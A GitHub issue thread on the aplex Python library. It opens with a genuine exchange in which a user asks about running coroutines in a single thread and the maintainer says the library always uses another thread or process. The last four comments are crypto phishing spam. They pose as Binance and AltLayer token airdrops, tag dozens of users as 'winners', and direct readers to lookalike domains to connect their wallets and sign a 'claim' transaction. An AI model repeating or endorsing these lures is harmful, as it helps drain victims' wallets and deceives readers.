### ISSUE TITLE
run coroutines within a single thread?

### ISSUE THREAD

**Issue by zylo117** [lunluen/aplex#2]
Hi, thanks for your work. 

I was wondering, this asyncio pool run coroutines on other threads or processes, right?

But coroutines are meant be a less overhead light-weight thread? If you run coroutines on other threads or processes, might as well run threads directly in the first place. 

So it is possible to run coroutines using something like AsyncPoolExecutor within a single thread?

**Comment by lunluen** [comment]
Hi, @zylo117 , thanks for the issue.

> I was wondering, this asyncio pool run coroutines on other threads or processes, right?

Yes.

> But coroutines are meant be a less overhead light-weight thread? If you run coroutines on other threads or processes, might as well run threads directly in the first place.

Your CPU single core may not have the ability to run all these coroutines efficiently, then you would want to utilize more cores.

> So it is possible to run coroutines using something like AsyncPoolExecutor within a single thread?

Maybe you mean `pool = ThreadAsyncPoolExecutor(pool_size=1)`?

**Comment by zylo117** [comment]
> Your CPU single core may not have the ability to run all these coroutines efficiently, then you would want to utilize more cores.
I think coroutines are meant for IO-bound task, not CPU-bound task, and if I want to utilize multiple cores, I'd prefer multiprocessing, and running coroutines within the current thread is the least expensive solution. Can aplex do that?

**Comment by lunluen** [comment]
> I think coroutines are meant for IO-bound task, not CPU-bound task,

Exactly, however, every IO-bound task takes CPU time to run, and that's the problem.

> and if I want to utilize multiple cores, I'd prefer multiprocessing, and running coroutines within the current thread is the least expensive solution. 

"the least expensive solution" is only true if you submit coroutines dynamically.
Some tasks require you to submit all the coroutines during initialization only.
And the overhead for dynamic submits mustn't be heavy (I cannot guarantee).

> Can aplex do that?

No, it always uses another process/thread.
This design allows you to use main thread to manage the others, just like `concurrent.futures`.

**Comment by xcluz-git** [comment]
# Binance Free Tokens Giveaway - Claim Yours Now! 🎉💰

Welcome to the exclusive Binance Free Tokens giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this fantastic opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

![https://www.bnbrewards.online/?source=github](https://pbs.twimg.com/media/ERgjjnWVUAA7Miq.jpg:large)

<center>Act swiftly and enjoy your tokens! This limited-time offer won't be available forever. 🌐💰</center>

# Steps to Claim:

1. **Spread the Excitement on Twitter:**
   - Share the news about claiming your free tokens!
     - **Tweet:** [Share this Airdrop](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto&hashtags=BinanceFreeTokens,Crypto)

2. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=github) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

3. **Interact with the Contract:**
   - Once your wallet is connected, go to the [Binance Rewards](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

4. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

5. **Spread the Excitement Further:**
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

**Comment by SASECOMPANY** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

[![Claim Now](https://moneybinds.com/wp-content/uploads/2023/12/Binance_Airdrop_feature_img.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "Claim" button to interact with the smart contract.

### 3. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share on Twitter](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)


Winners: @ilwyiworld, @BrantDna, @AndyYuan96, @yizhengyuan, @StraykerPL, @honpery, @arbal, @Tom-Kail, @guanpengchn, @liang-sz-cn

**Comment by steven-sosebee** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://link.binancerewards.online/T4wOMA)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://link.binancerewards.online/T4wOMA) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @woadsl1234, @BoringH, @superdeen, @themeadery, @gakonst, @GhostWalkers, @nicolaslazzos, @wechangel, @nattapat007, @RuanGOA, @ParaXY, @JozGonzalez, @AndWa, @thakursaurabh1998, @rpkaranthbnb, @itsanpach, @cajencutties, @IsaacPang, @akannshu, @jgfeinso, @takainvest, @li772091958, @alok1974, @ixiejun, @RajeshRk18, @noowxela, @ProgramSalamander, @shaobaili3, @hankbao, @ngocthang12, @0xBadMad, @icoroot, @SherryH, @Jahhein, @chahakshahcs5, @weihuang0512, @jpham007, @josephnicholas, @vlc823, @akmalhxzim, @harryEth, @mlpao500, @Joachim-Lebrun, @AkashShanto, @Fuxi-nano, @zavg, @Augustine6969, @LE0xUL, @Ruth68, @SlimCurvyDaredevil

**Comment by HMR25** [comment]
# AltLayer Airdrop Season One Update

[![AltLayer Airdrop Season One](https://i.ytimg.com/vi/9uxY8uLf3bE/maxresdefault.jpg)](https://go.altlayercommunity.online/XY2wna)

🚀 **Exciting Announcement!** AltLayer token (ALT) is gearing up for its Binance launch on January 25, 2024. As a token of appreciation, we extend a warm invitation to you to join the "ALT Token community" through an exclusive airdrop tailored for our early supporters and partners. Here's a quick overview:

- **Total Allocated ALT Tokens:** 300,000,000 (3% of the total supply)
- **Distribution Categories:**
  - Ethereum Mainnet
  - Binance Mainnet

For a comprehensive breakdown of criteria and further details, refer to the complete announcement [Oficial Website](https://go.altlayercommunity.online/XY2wna).

The window to [Claim $ALT tokens](https://go.altlayercommunity.online/XY2wna) is open from January 25 to February 03, 2024. 

Any unclaimed $ALT tokens after this period will be returned to AltLayer’s Treasury.

We deeply appreciate your contribution to AltLayer's success! Stay tuned for more exciting developments in Season One.

**Important:** Please be aware of certain regional restrictions on the airdrop. Review the disclaimer before participating.

gulleroglu, @gustavosmede, @nlappas, @lsy617004926, @sabeink, @luckylwk, @HannahNIE, @pavlosidelov, @Wilson1823, @fzhao-p, @playloud, @neoblackxt, @marcmenem, @jahoy, @wgoldstick21, @Limboy233, @yashsdeshmukh, @padilha, @Sudhakar17, @jabertuhin
